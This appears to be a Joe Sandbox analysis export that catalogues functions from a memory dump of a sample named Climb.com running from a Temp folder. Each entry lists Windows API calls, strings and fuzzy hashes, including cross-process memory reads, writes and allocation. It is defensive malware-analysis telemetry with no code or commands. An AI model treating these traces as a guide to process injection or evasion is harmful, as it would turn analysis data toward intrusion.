Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: cec8e753283a762db3d18f1de05883a7cf85208c3b173a8dc5f814af9ca0c98e
Instruction ID: 7c6e2c7c1b279a33d5cab7903e931d24d366e989db126a6d72e3ebb9013b288f
Opcode Fuzzy Hash: cec8e753283a762db3d18f1de05883a7cf85208c3b173a8dc5f814af9ca0c98e
Instruction Fuzzy Hash: BD01DC71800B058FCB30AFA6D880813FBF9BE602153109A3ED092529A1C7B0A849DF80

Function 005565AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 005565BF
GetWindowTextW.USER32(00000000,?,00000100), ref: 005565D6
MessageBeep.USER32(00000000), ref: 005565EE
KillTimer.USER32(?,0000040A), ref: 0055660A
EndDialog.USER32(?,00000001), ref: 00556624

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 077bb063a824fcaf593814b06f6b9e1c755f153f31a4b4ad488ea7c3eddfc954
Instruction ID: cf9b5994044e46b85a604ea8784a8f73f80cb5bfaec3f35b44ee5dcab519534f
Opcode Fuzzy Hash: 077bb063a824fcaf593814b06f6b9e1c755f153f31a4b4ad488ea7c3eddfc954
Instruction Fuzzy Hash: 9C018B70500308ABEF205F51DD5EF967BB8FF10706F40155AA947720D1EBF4694C9B54

Function 0052DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0052DAD2

Part of subcall function 00522D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0052DB51,005C1DC4,00000000,005C1DC4,00000000,?,0052DB78,005C1DC4,00000007,005C1DC4,?,0052DF75,005C1DC4), ref: 00522D4E
Part of subcall function 00522D38: GetLastError.KERNEL32(005C1DC4,?,0052DB51,005C1DC4,00000000,005C1DC4,00000000,?,0052DB78,005C1DC4,00000007,005C1DC4,?,0052DF75,005C1DC4,005C1DC4), ref: 00522D60

_free.LIBCMT ref: 0052DAE4
_free.LIBCMT ref: 0052DAF6
_free.LIBCMT ref: 0052DB08
_free.LIBCMT ref: 0052DB1A

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ea1d22e15c4c0b9ca16089d7dc4a771a62c3950dc1a396debec98af7e3dafbd3
Instruction ID: 0ee302317dc30ab523086f2ecb6d8e6f49e80298d61abbc0d87d6266ed23e38e
Opcode Fuzzy Hash: ea1d22e15c4c0b9ca16089d7dc4a771a62c3950dc1a396debec98af7e3dafbd3
Instruction Fuzzy Hash: D4F01232544625BB8668EB58F989C1A7BFDFE567117A50C05F009D7581DB30FC808E74

Function 00522610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0052262E

Part of subcall function 00522D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0052DB51,005C1DC4,00000000,005C1DC4,00000000,?,0052DB78,005C1DC4,00000007,005C1DC4,?,0052DF75,005C1DC4), ref: 00522D4E
Part of subcall function 00522D38: GetLastError.KERNEL32(005C1DC4,?,0052DB51,005C1DC4,00000000,005C1DC4,00000000,?,0052DB78,005C1DC4,00000007,005C1DC4,?,0052DF75,005C1DC4,005C1DC4), ref: 00522D60

_free.LIBCMT ref: 00522640
_free.LIBCMT ref: 00522653
_free.LIBCMT ref: 00522664
_free.LIBCMT ref: 00522675

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d039abe0e0324d10112efec5ef00065f3b882e7aee134bfc187d918e76582b2e
Instruction ID: 25b6f84a96bfaf208217b4df5a9c08bec38e68a462acda5c264b8186f04eabea
Opcode Fuzzy Hash: d039abe0e0324d10112efec5ef00065f3b882e7aee134bfc187d918e76582b2e
Instruction Fuzzy Hash: 7FF03A79841A31AF8706AF54FC05C483FA4FF36752B440A1AF410922B5DB35190ABFA8

Function 005212B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00521469
__freea.LIBCMT ref: 00521487

Part of subcall function 005218A7: _free.LIBCMT ref: 005218BF

Strings

am/pm, xrefs: 005214EA
a/p, xrefs: 0052154E

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: ba3554badf9cc07d4ccb92e92e22a5eaca40bc48c229c7bbe6b144e84b1164d2
Instruction ID: fcf899c3c48f2800f70f82a805c9ad85af33a3397da79105065816a105b83b35
Opcode Fuzzy Hash: ba3554badf9cc07d4ccb92e92e22a5eaca40bc48c229c7bbe6b144e84b1164d2
Instruction Fuzzy Hash: 4FD10571A00A269ACB249F68E8557BFBFB1FF77300F28055AE5069B6D0D3359D40CB98

Function 00575231 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 315COMMON

Download Yara Rule

APIs

Part of subcall function 005641FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,005752EE,?,?,00000035,?), ref: 00564229
Part of subcall function 005641FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,005752EE,?,?,00000035,?), ref: 00564239

GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00575419
VariantInit.OLEAUT32(?), ref: 0057550E
VariantClear.OLEAUT32(?), ref: 005755CD

Strings

bnU, xrefs: 005754ED, 005755E4

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ErrorLastVariant$ClearFormatInitMessage
String ID: bnU
API String ID: 2854431205-1416439054
Opcode ID: 2e8583ffb1674525836248840db77c7488594616827d98139afe114eb0e30c69
Instruction ID: a56be93d6bd043a2e1ef31644fb0e5df68bd3382933dd062dea463904c756438
Opcode Fuzzy Hash: 2e8583ffb1674525836248840db77c7488594616827d98139afe114eb0e30c69
Instruction Fuzzy Hash: A7D16D7090024D9FDB04DF95C495EEDBBB5FF48304F54841EE50AAB2A2EB71A98ACF50

Function 004FCF80 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004FD253

Strings

t5\, xrefs: 004FD23A
t5\, xrefs: 004FCFCF
t5\, xrefs: 004FCFC8

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Init_thread_footer
String ID: t5\$t5\$t5\
API String ID: 1385522511-1338728527
Opcode ID: 340a1e4ab9d7e9e5a22544fd1c2cf4a2cd83f3ca25e6824cf8709a910182d564
Instruction ID: 56747ac7f6e64b84bbff272ecb84f2ded3d92c37f1a5f39524f93a9384a49274
Opcode Fuzzy Hash: 340a1e4ab9d7e9e5a22544fd1c2cf4a2cd83f3ca25e6824cf8709a910182d564
Instruction Fuzzy Hash: 83913A75E0020ADFCB14CF98C590ABABBF2FF59314F24815ADA4597340D739EA82DB94

Function 005761A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 0057623D
_wcslen.LIBCMT ref: 00576249

Strings

bnU, xrefs: 005761B1, 005762E1
CALLARGARRAY, xrefs: 00576243, 00576248

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY$bnU
API String ID: 157775604-1021300608
Opcode ID: 1d531a13201180d803fa2ff7a551c320c3a835d6e2b148bb63a0a8f408e1302a
Instruction ID: 123ec5f213ed99371cbe1d3d0e3a679d1c901169c582cd544aabe3cf516630f6
Opcode Fuzzy Hash: 1d531a13201180d803fa2ff7a551c320c3a835d6e2b148bb63a0a8f408e1302a
Instruction Fuzzy Hash: BC41DF35A006199FCB00DFA5D8858FEBFB5FF58324B108029E509A7292E7709D81CB90

Function 00553063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0055BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00552B1D,?,?,00000034,00000800,?,00000034), ref: 0055BDF4

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 005530AD

Part of subcall function 0055BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00552B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0055BDBF

Part of subcall function 0055BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0055BD1C
Part of subcall function 0055BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00552AE1,00000034,?,?,00001004,00000000,00000000), ref: 0055BD2C
Part of subcall function 0055BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00552AE1,00000034,?,?,00001004,00000000,00000000), ref: 0055BD42

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0055311A
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00553167

Strings

@, xrefs: 0055317F

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 3a4a55e95fcf402703a0e5939100da028d9c673a7a176542cc9892679f2c6935
Instruction ID: 7170b1ca044a1a5e2b736d308337a935bf21f733874108c1beedfca8c714c9e8
Opcode Fuzzy Hash: 3a4a55e95fcf402703a0e5939100da028d9c673a7a176542cc9892679f2c6935
Instruction Fuzzy Hash: 09411B72900219AFDB10DBA4CD95BEEBBB8FF45741F104096FA45B7181DA706F89CB60

Function 00521A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\768400\Climb.com,00000104), ref: 00521AD9
_free.LIBCMT ref: 00521BA4
_free.LIBCMT ref: 00521BAE

Strings

C:\Users\user\AppData\Local\Temp\768400\Climb.com, xrefs: 00521AD0, 00521AD7, 00521B06, 00521B3E

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\768400\Climb.com
API String ID: 2506810119-1800092792
Opcode ID: 3a36d03f15e21ab6570531bf475583168a5d0c01059465455b5009b8a2c62ff4
Instruction ID: f158fd6fb34dc1d9ddb5c466e6c09caa39941c3245da94fa94396636edc21b5a
Opcode Fuzzy Hash: 3a36d03f15e21ab6570531bf475583168a5d0c01059465455b5009b8a2c62ff4
Instruction Fuzzy Hash: A0319575A00629AFCB11DF99E884D9FBFFCFF96310F104066E80497251E6704E40DB94

Function 0055CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0055CBB1
DeleteMenu.USER32(?,00000007,00000000), ref: 0055CBF7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005C29C0,018BFB88), ref: 0055CC40

Strings

0, xrefs: 0055CB8A

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 3d121840281bfe21358272446bac0d07c3c8ea5d47a79654446449a8f1c03ee9
Instruction ID: 9eafbcf01fd06d59521c1cb8f878a0d1995d1aee64f4e0d2138eef19c7ea2f89
Opcode Fuzzy Hash: 3d121840281bfe21358272446bac0d07c3c8ea5d47a79654446449a8f1c03ee9
Instruction Fuzzy Hash: 4441C3712043029FD710DF24D895B1ABFE4FF84725F04461EF9A5972D1C734A948CB62

Function 00584EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0058DCD0,00000000,?,?,?,?), ref: 00584F48
GetWindowLongW.USER32 ref: 00584F65
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00584F75

Strings

SysTreeView32, xrefs: 00584F1A

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 11a7794277965c504b8a19b93211cbcab8c565739cd972ea279136085f4032dc
Instruction ID: 7c9d5418ca55ba8f417961d26f8f2bb252d3498875cbe84766c8cbc75288e11b
Opcode Fuzzy Hash: 11a7794277965c504b8a19b93211cbcab8c565739cd972ea279136085f4032dc
Instruction Fuzzy Hash: CB318371214206AFDB119F78CC45BE67BA9FB54338F204719FE75A22E0D774AC509B50

Function 00573AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00573DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00573AD4,?,?), ref: 00573DD5

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00573AD7
_wcslen.LIBCMT ref: 00573AF8
htons.WSOCK32(00000000,?,?,00000000), ref: 00573B63

Strings

255.255.255.255, xrefs: 00573AF2, 00573AF7

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 08731f0e98d431fdd32b64b2b84f703050e45cd55a0da8e5c49449e91a67c8d7
Instruction ID: 3a59e161a396447fb6619b4ebdf95360c1515e57022b22b3b9d3e9372b27bfe0
Opcode Fuzzy Hash: 08731f0e98d431fdd32b64b2b84f703050e45cd55a0da8e5c49449e91a67c8d7
Instruction Fuzzy Hash: 6A318F396002029FCB10DF68D586EA97FE0FF55328F24C159E81E8B292D731EE45EB60

Function 00584954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 005849DC
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 005849F0
SendMessageW.USER32(?,00001002,00000000,?), ref: 00584A14

Strings

SysMonthCal32, xrefs: 005849A7

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: b32b1341df00dac90d4f136329a143bb405bced43fd0ce12978101d4c2cb04d3
Instruction ID: 599a3f31d7bfaff38158a0956f70efb27014875654add39e96565fbb29c99d7a
Opcode Fuzzy Hash: b32b1341df00dac90d4f136329a143bb405bced43fd0ce12978101d4c2cb04d3
Instruction Fuzzy Hash: F621BF3260021AABDF259F50CC46FEB3BA9FF48728F110214FE157B0D0D6B5A8559BA0

Function 005850F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 005851A3
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 005851B1
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 005851B8

Strings

msctls_updown32, xrefs: 00585122

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 19b6d7e908e97e4d8bf693f8c3debdba1d915fbe010faaf4b1518ec658cd477a
Instruction ID: 1d3586c0d8bce6780ed84c736182b4b9fd77fb63ae6b0b9361776d2ee27c14b6
Opcode Fuzzy Hash: 19b6d7e908e97e4d8bf693f8c3debdba1d915fbe010faaf4b1518ec658cd477a
Instruction Fuzzy Hash: 472151B5600609AFEB10EF14CC85DB73BADFB99364F040159F900A73A1DA70EC55DBA0

Function 00584253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 005842DC
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 005842EC
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00584312

Strings

Listbox, xrefs: 005842AB

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 5b8d98af970f71bce934ed1d2c5e290f4810815b1b847f03cd1e37a3455eef48
Instruction ID: 8c16719207889d1eefe2d6cccc23b2a4f432b10e0a5dccae4169a3a833ce3de1
Opcode Fuzzy Hash: 5b8d98af970f71bce934ed1d2c5e290f4810815b1b847f03cd1e37a3455eef48
Instruction Fuzzy Hash: B521B332604219BBEF119F94CC85FBF3B6EFB99754F118114FD01AB190CA719C528BA0

Function 00565439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0056544D
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 005654A1
SetErrorMode.KERNEL32(00000000,?,?,0058DCD0), ref: 00565515

Strings

%lu, xrefs: 005654B4

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
